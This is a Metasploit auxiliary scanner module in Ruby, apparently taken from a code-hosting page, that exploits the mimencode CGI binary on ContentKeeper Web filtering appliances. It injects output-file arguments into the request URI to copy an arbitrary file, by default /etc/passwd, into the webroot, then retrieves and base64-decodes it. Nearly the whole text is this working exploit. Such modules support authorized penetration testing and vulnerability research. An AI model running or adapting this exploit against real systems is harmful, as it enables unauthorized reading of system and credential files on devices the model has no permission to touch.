Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Scanner
9

10
  def initialize
11
    super(
12
      'Name' => 'ContentKeeper Web Appliance mimencode File Access',
13
      'Description' => %q{
14
        This module abuses the 'mimencode' binary present within
15
        ContentKeeper Web filtering appliances to retrieve arbitrary
16
        files outside of the webroot.
17
        },
18
      'References' => [
19
        [ 'OSVDB', '54551' ],
20
        [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
21
      ],
22
      'Author' => [ 'aushack' ],
23
      'License' => MSF_LICENSE)
24

25
    register_options(
26
      [
27
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
28
        OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
29
      ]
30
    )
31
  end
32

33
  def run_host(_ip)
34
    tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
35

36
    print_status("Attempting to connect to #{rhost}:#{rport}")
37
    res = send_request_raw(
38
      {
39
        'method' => 'POST',
40
        'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']
41
      }, 25
42
    )
43

44
    if (res && (res.code == 500))
45

46
      print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
47

48
      file = send_request_raw(
49
        {
50
          'method' => 'GET',
51
          'uri' => '/' + tmpfile
52
        }, 25
53
      )
54

55
      if (file && (file.code == 200))
56
        print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
57
      elsif (file && file.code)
58
        print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
59
      end
60
    elsif (res && res.code)
61
      print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
62
    end
63
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
64
  rescue ::Timeout::Error, ::Errno::EPIPE
65
  end
66
end
67

68